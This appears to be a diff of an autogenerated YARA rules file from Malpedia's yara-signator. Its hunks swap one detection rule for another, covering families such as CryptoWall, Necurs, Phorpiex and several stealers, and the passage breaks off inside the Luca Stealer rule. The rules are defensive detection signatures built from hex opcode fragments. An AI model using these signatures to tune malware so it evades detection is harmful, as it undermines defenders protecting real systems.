@@ -103774,32 +104011,32 @@ rule MALPEDIA_Win_Webc2_Div_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 69c080ee3600 59 ebe8 }
-		$sequence_1 = { 8078056e 7512 80780663 750c 80780765 7506 }
-		$sequence_2 = { 8d7d02 83c9ff c70001000000 8d5008 33c0 f2ae f7d1 }
-		$sequence_3 = { c3 55 e8???????? 59 33c0 ebf0 81ec10020000 }
-		$sequence_4 = { 7573 80780661 756d 80780766 }
-		$sequence_5 = { 7f09 0fbed0 83ea17 89148e 8d6901 bf16000000 8bc5 }
-		$sequence_6 = { 5f e9???????? 6a3c 51 e9???????? }
-		$sequence_7 = { ff742410 eb14 817c2410808d5b00 771a 8b442414 }
-		$sequence_8 = { 83e803 bf???????? 80240100 83c9ff 33c0 f2ae f7d1 }
-		$sequence_9 = { 8b048e 8d1c9510114000 8b17 2bc2 99 }
+		$sequence_0 = { eb28 8b05???????? f7d0 488d4c2430 488d942440030000 a900004010 7507 }
+		$sequence_1 = { eb1c 4c8d058c761100 41b905000000 4889f9 4889da e8???????? b102 }
+		$sequence_2 = { 4d31e8 4831eb 49c1c120 49c1c420 49c1c020 4c89442428 48c1c320 }
+		$sequence_3 = { e8???????? 4c8d05e9c90d00 488d7c2440 4889f9 4889f2 e8???????? 488b37 }
+		$sequence_4 = { e8???????? 488bbbd8100000 488b83e0100000 486bb3e810000018 4c8d3437 4889bb60050000 48898368050000 }
+		$sequence_5 = { e9???????? c1e70c 09c7 40f6c501 0f844c010000 66662e0f1f840000000000 81ff00001100 }
+		$sequence_6 = { 4901c0 4c89e1 4889c2 e8???????? 4d8b7c2410 408a7e40 0f104641 }
+		$sequence_7 = { e8???????? 803e00 0f84c9000000 488b442428 eba2 807b0800 0f84d1000000 }
+		$sequence_8 = { f04c0fb129 0f84ec010000 4989c6 488b4508 4885c0 0f84d9feffff f048ff08 }
+		$sequence_9 = { eb0c 488d542440 48c70205000000 4889f9 e8???????? e9???????? 4c8d05fb400e00 }
 
 	condition:
-		7 of them and filesize < 32768
+		7 of them and filesize < 3432448
 }
-rule MALPEDIA_Win_Stealer_0X3401_Auto : FILE
+rule MALPEDIA_Win_Unidentified_109_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1ccbeb2b-8652-556b-a78e-87a19479b4d7"
+		id = "d4a6c411-a7e9-5954-916e-935ded59522f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealer_0x3401"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stealer_0x3401_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_109"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_109_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "00bd8b2b3e3b3733d5bcbc0fb6b2848b3225fb02bf487f9ea61c20713054d985"
+		logic_hash = "758f313f75d70626faf4a10de9d767fa1ab2c47be3c297f5f181d9298dc68601"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103813,32 +104050,32 @@ rule MALPEDIA_Win_Stealer_0X3401_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c5 8945fc 53 56 57 33db bf01000000 }
-		$sequence_1 = { 6800400000 8d85f07fffff c745fc00000000 6a00 }
-		$sequence_2 = { 898850030000 8b4508 59 c74048a8640210 8b4508 }
-		$sequence_3 = { 83c40c c785acfdffff04010000 8d85acfdffff 50 8d85e8fdffff 50 }
-		$sequence_4 = { c645fc0b 8d4da8 e8???????? 83c408 6aff c645fc0c }
-		$sequence_5 = { 837c240800 75be ddd8 db2d???????? b802000000 833d????????00 0f8590190000 }
-		$sequence_6 = { 8d4c2434 e8???????? 53 e8???????? 83c404 8d44242c 8bcf }
-		$sequence_7 = { 50 6a00 66c745d90000 c645db00 660fd645e6 66c745ee0000 ffd7 }
-		$sequence_8 = { 50 8d45f4 64a300000000 8d8580fdffff c7857cfdffff00000000 50 ff15???????? }
-		$sequence_9 = { f30f59c1 f30f110424 e8???????? f30f100d???????? 8b559c f20f5ac0 51 }
+		$sequence_0 = { 48039790020000 e8???????? 428d0433 488b5c2460 898798020000 2bc6 85ed }
+		$sequence_1 = { 0f8546020000 e9???????? 488d542420 488d4c2420 e8???????? 8bd8 c744242800000000 }
+		$sequence_2 = { 488b4210 416bf81c 83ef1c 428b5480fc 85d2 740d }
+		$sequence_3 = { 488978d8 8978e0 8b4208 458d4a01 8bef 394108 }
+		$sequence_4 = { 85c0 0f8562fdffff 488b4710 488b4808 0fb68776020000 8801 488b4710 }
+		$sequence_5 = { 4833c8 4823cd 4833ca 48c1c120 498948f8 49ffc9 75b6 }
+		$sequence_6 = { 8d5883 e9???????? 448b6d97 c6879803000001 c7456701000000 4585ed 0f8e3c020000 }
+		$sequence_7 = { 0f8747040000 418bc0 803c1830 0f853a040000 418d4901 418bd4 3bcd }
+		$sequence_8 = { 41ffc8 75ed eb04 410fb6c8 8d040a 413bc3 0f877c010000 }
+		$sequence_9 = { 80b97502000001 7304 3cfe 7517 488b8950090000 488d542430 }
 
 	condition:
-		7 of them and filesize < 357376
+		7 of them and filesize < 723968
 }
-rule MALPEDIA_Win_Bka_Trojaner_Auto : FILE
+rule MALPEDIA_Win_Stealhook_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "74ec4af9-e2de-59bf-b310-d52e9a27c28c"
+		id = "519c47bf-6262-59f6-ba96-b268e3554c31"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bka_trojaner_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealhook"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stealhook_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "b667f447169e58d5bdd1a72921cf0718ce5c118c508bba9ba523771b59233c38"
+		logic_hash = "34472d9d45445d7f0701c527e6f0fa4bcdf4882e35f9c62ec30365acd8243253"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103852,32 +104089,32 @@ rule MALPEDIA_Win_Bka_Trojaner_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 894c2438 897c242c 897c2430 89542424 0f84c0010000 3bdf }
-		$sequence_1 = { 756b 837b1c00 7565 a1???????? }
-		$sequence_2 = { 6a00 8d44246c 50 56 ffd3 8b4d74 50 }
-		$sequence_3 = { 8d8170ffffff 83ec10 33d2 85c0 7410 }
-		$sequence_4 = { 6a00 50 894638 ff15???????? 8b4604 }
-		$sequence_5 = { 6a00 8d44246c 50 56 ffd3 }
-		$sequence_6 = { 85c0 7cd1 8b07 8b08 }
-		$sequence_7 = { 89842460080000 8d442420 50 68???????? 68???????? 33db 56 }
-		$sequence_8 = { 6a0c 68???????? e8???????? c745e4d0c64000 817de4d0c64000 }
-		$sequence_9 = { 8b542448 894104 8b44244c 895108 8b542464 }
+		$sequence_0 = { 4983c002 4863c8 493bc9 72d8 488d3599d60700 418bc5 4983fa07 }
+		$sequence_1 = { 488bc6 4983fa07 490f47c3 6644390401 7410 ffc2 4883c102 }
+		$sequence_2 = { 4c8b642440 488b75cf 498b7d28 4885ff 7e0a 483bfe 7605 }
+		$sequence_3 = { f30f7f4590 c6458000 0f57c0 0f11442420 4889742430 4889742438 4c8d7dc0 }
+		$sequence_4 = { 488b442478 49894550 49894558 49899d80000000 488b05???????? 49894574 49896d68 }
+		$sequence_5 = { 84c0 0f84e3020000 488d4d18 48837d300f 480f474d18 80397f 0f83cc020000 }
+		$sequence_6 = { 488b8c2428010000 e8???????? 488b8c2428010000 e8???????? 488b942428030000 4883fa07 763b }
+		$sequence_7 = { 488bd5 488bc7 48d1ea 482bc2 483be8 77e3 }
+		$sequence_8 = { e8???????? 0f1038 0f117dc0 0f107010 0f1175d0 }
+		$sequence_9 = { 450fb706 4885db 744c 488b4340 48833800 741f }
 
 	condition:
-		7 of them and filesize < 221184
+		7 of them and filesize < 1129472
 }
-rule MALPEDIA_Win_Nachocheese_Auto : FILE
+rule MALPEDIA_Win_Dadstache_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "119ab577-2997-5077-8fbd-28bff11c20d6"
+		id = "83ac24de-2d4c-56ca-a52b-b61e76854726"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nachocheese"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nachocheese_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dadstache_auto.yar#L1-L172"
 		license_url = "N/A"
-		logic_hash = "cadb77319f92fe40994b6aeeeca327d5d465905297aa3f5228d474dfd2f50f6d"
+		logic_hash = "25ccaa507f10be35b704008ec9887b279a6b66e6fbc6fcb0d9200b947fa69258"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103891,38 +104128,38 @@ rule MALPEDIA_Win_Nachocheese_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8945fc eb34 83f817 7532 8b7710 }
-		$sequence_1 = { 3d2cc00000 7f18 3d2bc00000 7d1b }
-		$sequence_2 = { 2bfa 8d47fd 3901 8901 }
-		$sequence_3 = { 56 e8???????? 50 e8???????? 6a0a 6a4e }
-		$sequence_4 = { 7305 83c303 eb1c 81fb00000100 }
-		$sequence_5 = { 50 32db ff15???????? 85c0 7473 8b55f4 }
-		$sequence_6 = { c785e0f9ffff02000000 ff15???????? 3b05???????? 740a a3???????? }
-		$sequence_7 = { 3d9f000000 7e0d 33c0 c3 }
-		$sequence_8 = { 53 33db 8d4df4 51 66c1c008 }
-		$sequence_9 = { 33c0 c3 05d13fffff 83f801 }
-		$sequence_10 = { 33c8 894710 8b4708 33c1 }
-		$sequence_11 = { b810270000 6806100000 8945fc 8945f4 }
-		$sequence_12 = { 3d2bc00000 7d1b 3d9c000000 7c07 3d9f000000 }
-		$sequence_13 = { 40 50 e8???????? b9???????? 83c424 }
-		$sequence_14 = { 8bcf 51 6804010000 68???????? eb38 8dbc24a0010000 8bce }
-		$sequence_15 = { 7305 83c302 eb29 81fb00010000 7305 83c303 }
+		$sequence_0 = { a3???????? c605????????03 ff15???????? 68c8000000 }
+		$sequence_1 = { e9???????? 80f902 0f85f8000000 8b830c020000 }
+		$sequence_2 = { 8bd8 83c408 85db 0f858e000000 6aff ff35???????? }
+		$sequence_3 = { 85c0 7409 50 ffd6 8b15???????? 85d2 }
+		$sequence_4 = { 83c710 8b45f0 8b5dec c1e810 0fb6c0 c1e918 8b55e8 }
+		$sequence_5 = { 68c8000000 ff15???????? 8b45ec 8d5302 46 ebd7 6a64 }
+		$sequence_6 = { 6a00 83e103 8d85fcfdffff 6a00 }
+		$sequence_7 = { ff35???????? ff15???????? 85c0 0f8461ffffff 8b45fc 3dc8000000 751c }
+		$sequence_8 = { 50 57 c745c075616c41 c745c46c6c6f63 c645c800 ffd3 }
+		$sequence_9 = { 660f6e8838ffffff 660f76f5 660f62d8 0f28e6 660f62ca }
+		$sequence_10 = { 0f8409010000 85c0 0f8401010000 6a20 }
+		$sequence_11 = { 57 c745e075616c46 c745e472656500 ffd3 837e0400 894610 7438 }
+		$sequence_12 = { 0f28e6 660f6e5084 660fdbfe 660f62d9 0f57f6 }
+		$sequence_13 = { 85f6 7437 837e0c00 7431 85d2 742d }
+		$sequence_14 = { 83c060 660f6e5024 8d8040010000 660f6e80bcfeffff 0f57f6 660f6e8894feffff }
+		$sequence_15 = { 74d5 ff7654 8b55e8 8bcf e8???????? 8b4dfc }
 
 	condition:
-		7 of them and filesize < 1064960
+		7 of them and filesize < 580608
 }
-rule MALPEDIA_Win_Cryptowall_Auto : FILE
+rule MALPEDIA_Win_Darkmoon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0b206dc1-5d58-50e7-8b0b-4a1659e8c327"
+		id = "5d3b6757-7119-5541-a7be-7724ca1cd5bf"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cryptowall_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkmoon_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "ce5a2f67f32819e2223821b9858e69dbea24618850279ae1bc1fe9c840f1999e"
+		logic_hash = "d37414a84f00a17b4ccc08379aad2daedc420510e1678b61639cea473c36abeb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103936,32 +104173,32 @@ rule MALPEDIA_Win_Cryptowall_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 6a40 6a01 6a01 6a00 6a00 8d55e8 }
-		$sequence_1 = { 8b55f4 6689044a ebd0 8b450c 8b4df4 }
-		$sequence_2 = { 83f861 7c13 0fbe4d08 83f97a 7f0a 0fbe5508 83ea20 }
-		$sequence_3 = { 52 e8???????? 83c408 8b0d???????? 8981d8000000 }
-		$sequence_4 = { 740d 8b45fc 2d00080000 8945fc ebe5 8b45fc }
-		$sequence_5 = { 8b45fc 2d00080000 8945fc ebe5 8b45fc 8be5 }
-		$sequence_6 = { 55 8bec 51 837d0800 7441 837d0c00 }
-		$sequence_7 = { 52 e8???????? 83c408 8b0d???????? 89819c000000 }
-		$sequence_8 = { 55 8bec 8b450c 8d4c0002 51 }
-		$sequence_9 = { e8???????? 83c404 8b5508 8b4204 50 8b4d08 8b5108 }
+		$sequence_0 = { 6802000080 ff5645 8d45fc 50 }
+		$sequence_1 = { 50 ff5679 6a00 8d8514faffff }
+		$sequence_2 = { 0f843cffffff 33c0 6a00 c1e009 6a00 }
+		$sequence_3 = { 51 50 50 8d860f040000 }
+		$sequence_4 = { 6a00 6800000080 8d86b1060000 50 ff5659 50 6888b6b6fc }
+		$sequence_5 = { 33d2 8dbe48010000 6834284050 8903 6800080000 56 894b04 }
+		$sequence_6 = { 8d44241c 52 8b542414 8d4c2418 50 }
+		$sequence_7 = { 8d4f0c 52 e8???????? 8d44240c }
+		$sequence_8 = { ff96d1000000 5a 59 8901 59 03d1 ebd3 }
+		$sequence_9 = { 8d86120e0000 8945cc 8d45dc 50 6a01 }
 
 	condition:
-		7 of them and filesize < 417792
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Rifdoor_Auto : FILE
+rule MALPEDIA_Win_Moontag_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "499aaa99-f413-5777-add2-b3ffc4ab58b2"
+		id = "252dd0ca-7f51-52f0-be53-827b6e26bc25"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rifdoor_auto.yar#L1-L169"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moontag"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.moontag_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "238633b85866a846f2bb6c165a492790b5a2e2a57ade12fcf4d261ecd5fc10cd"
+		logic_hash = "370fc05010b7ffbaa6352b0066ee43dee7ad1117e24576294ef38cbd09f73c67"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103975,40 +104212,34 @@ rule MALPEDIA_Win_Rifdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4318 b9???????? 895c2414 e8???????? }
-		$sequence_1 = { 395c2414 7529 395c2418 7523 }
-		$sequence_2 = { 8b15???????? 83c408 6a00 6a12 8d4c240c 51 }
-		$sequence_3 = { 40 0080a640008a 46 0323 }
-		$sequence_4 = { 8b542414 8bf8 52 57 e8???????? 83c40c }
-		$sequence_5 = { 83c40c 6bc930 8975e0 8db1304b4100 }
-		$sequence_6 = { 33dd c1e311 c1e808 0bc3 }
-		$sequence_7 = { ffd6 a3???????? 895c2410 8d4c2410 51 8d4310 }
-		$sequence_8 = { 8d95e8fbffff 52 ff15???????? 8d85e8fbffff 50 8bc8 51 }
-		$sequence_9 = { c745e888130000 ff15???????? 8bc6 8b4dfc 5f 33cd 5e }
-		$sequence_10 = { 46 8935???????? e9???????? 5f }
-		$sequence_11 = { 59 83f83c 762a 56 e8???????? 8d0445bc124100 }
-		$sequence_12 = { 51 8d9574fcffff 52 6a00 6a00 56 50 }
-		$sequence_13 = { 83ffff 0f84bb000000 53 53 8d95f4f7ffff 52 }
-		$sequence_14 = { 51 56 89b5f4feffff ffd7 85c0 7413 5f }
-		$sequence_15 = { 53 57 8d858cf8ffff 50 8d8d24ffffff }
+		$sequence_0 = { 488d3d17430000 4885db 7407 44383b 480f45fb 488d45b0 }
+		$sequence_1 = { f20f100d???????? 0f11442448 48895c2428 48896c2430 896c2440 89742444 f20f114c2458 }
+		$sequence_2 = { 48894320 48894328 48894330 48894338 c7431802000000 48896c2430 4885ff }
+		$sequence_3 = { c60322 eb2c c60362 eb27 c60366 eb22 c6036e }
+		$sequence_4 = { 33d2 448d4264 488d4d94 e8???????? c7459068000000 }
+		$sequence_5 = { 0f100d???????? 48894dc0 8d4b40 f20f1005???????? 66480f7ec8 488955c8 }
+		$sequence_6 = { 48895de0 448bcb 48895de8 48895df0 }
+		$sequence_7 = { 7354 498b0cff e8???????? 488bd8 4885c0 7420 }
+		$sequence_8 = { 0fb744244a 3bc1 7f13 0f8c68010000 0fb744244c }
+		$sequence_9 = { 4885db 0f8487000000 488d4580 4883fe10 480f43c7 4883fb01 7518 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 140288
 }
-rule MALPEDIA_Win_Phorpiex_Auto : FILE
+rule MALPEDIA_Win_Necurs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "93126ddf-7d23-57a9-b11d-b555411adf12"
+		id = "6a74d2a0-5b63-50c2-96d3-f0fbeed1b3d4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.phorpiex_auto.yar#L1-L281"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.necurs_auto.yar#L1-L154"
 		license_url = "N/A"
-		logic_hash = "ecdba64c76b9c6ee0e76612106be4a9e4db8b2914c6804e0ef9feb32643b1afb"
+		logic_hash = "1a877e35a35cc5b42dec49f688cab91a0513382e31843c1efea0701ab2d894e0"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -104020,52 +104251,37 @@ rule MALPEDIA_Win_Phorpiex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 85c0 740f 6a07 }
-		$sequence_1 = { 6a00 ff15???????? ff15???????? 50 e8???????? }
-		$sequence_2 = { ff15???????? 85c0 741f 6880000000 }
-		$sequence_3 = { 6a20 6a00 6a00 6a00 8b5508 }
-		$sequence_4 = { 83c410 6a00 6a02 6a02 6a00 6a00 }
-		$sequence_5 = { 6a01 6a00 68???????? e8???????? 83c40c 33c0 }
-		$sequence_6 = { e8???????? 99 b90d000000 f7f9 }
-		$sequence_7 = { e8???????? 83c404 e8???????? e8???????? ff15???????? 6a00 }
-		$sequence_8 = { 52 683f000f00 6a00 68???????? 6802000080 ff15???????? 85c0 }
-		$sequence_9 = { 68???????? ff15???????? 8d85f8fdffff 50 68???????? }
-		$sequence_10 = { 6a00 682a800000 6a00 ff15???????? }
-		$sequence_11 = { ff15???????? 6a00 ff15???????? 85c0 7418 ff15???????? }
-		$sequence_12 = { 6a01 ff15???????? ff15???????? b001 }
-		$sequence_13 = { f7f9 81c210270000 52 e8???????? }
-		$sequence_14 = { 52 e8???????? 83c418 eb04 }
-		$sequence_15 = { 68???????? ff15???????? e9???????? 8d45fc }
-		$sequence_16 = { ff15???????? 8945f8 837df800 7429 8b45f8 50 }
-		$sequence_17 = { ff15???????? 8945fc 837dfc00 7416 8b4df8 51 ff15???????? }
-		$sequence_18 = { 50 e8???????? 59 59 85c0 0f85c0000000 }
-		$sequence_19 = { 3d00010000 7504 83c8ff c3 8b542404 }
-		$sequence_20 = { 3db7000000 7508 6a00 ff15???????? 6804010000 }
-		$sequence_21 = { 6a21 50 e8???????? c60000 }
-		$sequence_22 = { 52 e8???????? 99 b960ea0000 f7f9 }
-		$sequence_23 = { 85c0 746b 8b9424b8000000 8a8414a8000000 8d9414a8000000 84c0 }
-		$sequence_24 = { 50 68???????? 8d4c2468 68ff010000 51 e8???????? 6a40 }
-		$sequence_25 = { 81ec20010000 56 57 6a00 6a00 6a03 6a00 }
-		$sequence_26 = { 40 41 663bc2 72f7 53 33c0 }
-		$sequence_27 = { 50 8d45ec 50 6805000020 }
-		$sequence_28 = { 56 57 68e8030000 ff15???????? e8???????? be???????? }
-		$sequence_29 = { 8d45f8 50 8d45e4 50 6805000020 }
+		$sequence_0 = { 56 8bf2 ba06e0a636 f7e2 }
+		$sequence_1 = { f7f6 8bc2 034508 5e 5d c3 }
+		$sequence_2 = { ba06e0a636 f7e2 03c8 a1???????? 13f2 33d2 }
+		$sequence_3 = { 13f2 33d2 030d???????? a3???????? }
+		$sequence_4 = { 8bc8 a1???????? 56 8bf2 }
+		$sequence_5 = { 8935???????? 890d???????? 8bc1 5e c3 55 8bec }
+		$sequence_6 = { a1???????? 13f2 a3???????? 8935???????? }
+		$sequence_7 = { 8d85ecfbffff 57 50 e8???????? 83c410 }
+		$sequence_8 = { 33d7 33c1 52 50 e8???????? }
+		$sequence_9 = { 6a7b 50 ffd6 8bf8 59 59 }
+		$sequence_10 = { 7409 8bc1 8bd7 e9???????? }
+		$sequence_11 = { 53 ff15???????? 59 33c0 5e 5b }
+		$sequence_12 = { 6a7d 50 ffd6 59 59 85c0 }
+		$sequence_13 = { 33d2 5e 5f c9 }
+		$sequence_14 = { e9???????? 83caff 8bc2 e9???????? }
 
 	condition:
-		7 of them and filesize < 2490368
+		7 of them and filesize < 475136
 }
-rule MALPEDIA_Win_Zeoticus_Auto : FILE
+rule MALPEDIA_Win_Lowzero_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9de59c35-1f7d-51f9-8134-b24208326bd1"
+		id = "2e1f2236-1021-58b7-bec6-2914502da5b8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeoticus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zeoticus_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowzero"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lowzero_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "3f9c97113f0506e69ec31e3ee70b01bb1f52832387d7caa17b96ec4c6d0f2f8c"
+		logic_hash = "8a0cc8f946fea76f2b3b346672d13b547cb8ca0c916aea88c757b9309e0ee850"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104079,32 +104295,32 @@ rule MALPEDIA_Win_Zeoticus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 660f62f9 660fd4bc2400010000 0f284c2430 660fd4f8 660f3a0f4c241008 660fefdf 8b942414010000 }
-		$sequence_1 = { 6a15 ba???????? b90b7a9652 e8???????? 83c408 a3???????? 680c0e0000 }
-		$sequence_2 = { 33c9 66c787701110000001 90 8a8100674300 88840f90101000 41 }
-		$sequence_3 = { 2b9d74ffffff 898568ffffff 8b8544ffffff 2b4594 8b7dc8 2bbd78ffffff }
-		$sequence_4 = { 660f62ca 660f6e9424a4000000 0f295c2430 0f28442430 660f6e5c2444 660f62c1 660f6e4c2440 }
-		$sequence_5 = { 8b74240c ba???????? 680f8ed51c 6a16 b932347982 c744241801000000 c744242402000000 }
-		$sequence_6 = { 8d4901 83ea01 75f5 8bcb 2bf3 ba20000000 0f1f8000000000 }
-		$sequence_7 = { 6a03 68???????? 6a0a 68???????? e8???????? 685d0b4077 6a0a }
-		$sequence_8 = { 660f72d00e 660f72f412 660fefa590feffff 660fefe0 0f28c5 660ffec7 0f29a530ffffff }
-		$sequence_9 = { 2b9d78ffffff 2bbd7cffffff 2b7580 2b5584 898524ffffff 8b8534ffffff 8945b4 }
+		$sequence_0 = { 53 ffd0 85c0 750a 685a040000 e9???????? c7471001000000 }
+		$sequence_1 = { 7439 03c3 837f1400 7425 }
+		$sequence_2 = { 8b45d4 89473c 8b441154 3945f4 7318 6a0d ff15???????? }
+		$sequence_3 = { 47 2bc8 8d4602 03c3 3b450c }
+		$sequence_4 = { e8???????? 83c40c 03f3 eb0b 2bce 8a0431 }
+		$sequence_5 = { 8945f0 8945d8 eb25 8b03 }
+		$sequence_6 = { 0fb61f 83c307 47 0fb607 47 2bc8 }
+		$sequence_7 = { 56 e8???????? 8b55fc 8bca 57 8b423c 8b55f4 }
+		$sequence_8 = { 2bca 49 83fb07 7507 0fb61f 83c307 }
+		$sequence_9 = { 6a01 53 ffd0 85c0 750a 685a040000 }
 
 	condition:
-		7 of them and filesize < 468992
+		7 of them and filesize < 433152
 }
-rule MALPEDIA_Win_Danbot_Auto : FILE
+rule MALPEDIA_Win_Luca_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "da55061d-0704-5ad4-a81b-0f3aa0376e8a"
+		id = "719beb67-5539-58f6-b79d-9238d1f007ac"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.danbot_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.luca_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.luca_stealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "5da6053f066e9d13d04800876e4e18c27ca9158fbdceb66408c8360c250a0789"
+		logic_hash = "2b38c28929c2cf366b6c27d4893332041148ce4dfc12e9c48178a2f3e634135c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -104118,32 +104334,32 @@ rule MALPEDIA_Win_Danbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 440fb77c2430 41beffff0000 4885ff 7412 410fb7d7 488bcf e8???????? }
-		$sequence_1 = { e8???????? 488b4d10 4533d2 eba8 488b4d10 488d4500 }
-		$sequence_2 = { 4d8bc6 498bcf e8???????? e9???????? 4883fe10 7217 }
-		$sequence_3 = { c644243001 4883c702 4983ed01 75d6 e9???????? 0f29442430 488d7dbf }
-		$sequence_4 = { eb03 4d8be3 488b442448 8b5818 81e3c0010000 895c2424 83fb40 }
-		$sequence_5 = { 4983c8ff 49ffc0 46383402 75f7 488d4db0 e8???????? 488d45b0 }
-		$sequence_6 = { 418ade 488bcf e8???????? 498bd7 488bcf e8???????? 84c0 }
-		$sequence_7 = { eb03 488bc3 6644893448 eb22 48837b1808 7205 488b03 }
-		$sequence_8 = { 48837dff10 732c 4533c0 418d5008 488d4def e8???????? 4c8b4597 }
-		$sequence_9 = { 90 e9???????? 84c9 0f8453020000 8b442430 85c0 7408 }
+		$sequence_0 = { e8???????? 83a4248800000000 4c8d842488000000 4c8bcf 488d4c2430 488bd0 e8???????? }
+		$sequence_1 = { e8???????? 488d8d60110000 4889f2 4c8b85a01c0000 e8???????? 488b03 4885c0 }
